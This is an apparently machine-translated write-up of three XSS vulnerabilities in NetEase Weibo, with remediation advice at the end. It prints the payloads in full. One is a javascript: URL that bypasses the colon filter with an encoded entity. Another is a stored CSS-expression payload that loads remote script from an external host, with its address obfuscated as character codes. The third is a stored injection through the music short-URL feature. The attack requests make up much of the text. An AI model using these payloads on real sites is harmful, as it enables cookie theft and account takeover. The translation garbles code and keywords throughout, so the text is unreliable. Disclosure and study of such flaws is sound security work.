Netease Weibo content storage + home page storage + sub-page XSS and repair

At present, several websites that have Weibo are all quickly forwarded, and Netease has not detected it yet. This evening, I ran to perform a test on Netease Weibo. Three XSS are found.
 
1. content storage-type XSS, the harm is not explained. Seeing Weibo is just a trick. Kill all browsers
2. The storage-type XSS, IE, 6, 7, and 8 + modes of Weibo homepage are effective.
3. Weibo subpage XSS.
 
For more information, see.
 
BTW, for a gift ....

Here we will share with you the detection method.
 
From small vulnerabilities to large vulnerabilities.
 
----------------------------------------------------------
 
1. subpage XSS.
 
Habitually look at the source code of the web page. The following section is found.
 
<Script type = "text/javascript">
(Function (){
Var url = location. toString ();
Var index = url. indexOf ('#! ');
If (index! =-1 ){
Location. replace (url. substr (index + 2). replace (/\:/g ,''));
}
})();
</Script>
 
 
Then we can construct a URL to execute our command.
 
Http://t.163.com/tbox! Javascript: alert (document. cookie );
 
 
But from the code, we can see that NetEase filtered out the colon:
 
However, in IE (win7 + IE9 during testing), we can bypass it in the following ways.
 
Http://t.163.com/tbox! Javascript & # x3A; alert (document. cookie );
 
 
Proof of effect:
 
 
 
----------------------------------------------------------
 
2. Vulnerability 2: personal homepage storage-type XSS. Because it is in css, expression is used for IE6, 7, and IE8 compatibility modes.
 
This vulnerability is relatively low, so I will not elaborate on it.
 
Defect location: Weibo skin replacement function.
Defect URL: http://t.163.com/user.do? Action = updateUserConfig
Defect parameters: (4)
Profile_background_image_url
Profile_background_pos
Profile_background_fixed
Profile_background_filled
Cause of defect: No filter (,),;, which can be used to close the css.
 
Procedure:
 
POST http://t.163.com/user.do? Action = updateUserConfig
POSTDATA
Profile_background_image_url =); color: expression (if (! Window. x) {window. x = 1; var s = document. createElement (String. fromCharCode (115,99, 114,105,112,116); s. type = String. fromCharCode (116,101,120,116, 47,106, 97,118, 97,115, 99,114,105,112,116); s. src = String. fromCharCode (104,116,116,112, 47,120,115,115,116, 46,115,105,110, 112,112, 111,109, 47,109, 46,106,115,); document. body. appendChild (s) ;}); :(
 
 
The above code calls external JS and I will not prove it here. Security personnel must know it.
 
 
----------------------------------------------------------
 
3. Weibo content storage type XSS, which has obvious dangers.
 
Share the following findings:
 
A. First of all, I personally prefer to test the multimedia function. I tried the music sending function of Weibo and captured packets while sending it.
 
We can see that there are two packet capture requests.
 
Request 1: generate a short URL for the music address
 
POST http://t.163.com/music.do? Action = tow.url
POSTDATA
 
Url http://www.xiami.com/song/1769227691
 
 
Request 2: Push Weibo content
 
POST http://t.163.com/tweet.do? Action = addTweet
POSTDATA
 
Content Somewhere Only We Know-Keane http://163.fm/QJ5yOnj
IsRetweet 0
ReplyOriginal 0
ReplyIt 0
Flag 0
ImageUrl
VoteUrl
 
 
B. According to my consistent way of thinking, F12 opened chrome's debugging tool and located the Weibo post.
 
Find the following interesting content.
 
 
 
 
C. You can see that the address is the address of the played song, that is, the address in Step A, which is converted to the short URL.
 
Then let's take a look at what I imagined.
 
It would be nice if Weibo developers output the content of the short website to this site without any filtering?
 
If there is no filtering, we can build the following code for XSS
 
<
 
D. Follow these steps to perform XSS.
 
E. convert a URL containing malicious code into a short URL
 
POST http://t.163.com/music.do? Action = tow.url
POSTDATA
 
Url = http://www.xiami.com/song/2068536? "'> <
 
Return data to get short URL http://163.fm/QJ5yOnj
 
 
F. Put the constructed short URL into the content for sending
 
POST http://t.163.com/tweet.do? Action = addTweet
POSTDATA
 
Content Somewhere Only We Know-Keane http://163.fm/QJ5yOnj
IsRetweet 0
ReplyOriginal 0
ReplyIt 0
Flag 0
ImageUrl
VoteUrl
 
 
G. refresh our microblog and we will find that there is an additional microblog and cookies pop up. This proves that our conjecture is correct ~~ For further confirmation, we can open the Chrome debugging tool to see
 
 
 

Proof of effect:
 
In chrome, view the pop-up window of Weibo:
 
 
 
 
IE, after paying attention to the above number with another number, the pop-up window is sent by the above number on the home page.
Www.2cto.com
 



 
 
 
 
As for Firefox, I will not test it because there is no browser compatibility problem during this exploitation process.
 


Solution:

1. For the XSS of the sub-page, except filter the colon, you should judge ,#! For future content, strengthen judgment.
 
2. There are several minimum regular expressions for the XSS on the personal homepage. For example, the parameter profile_background_fixed is limited to 0 and 1. Then, filter out characters that may close css.
 
3. For the 3rd XSS, encodeURIComponent encodes the obtained real address when reading the real song address from the short URL, and then output the code!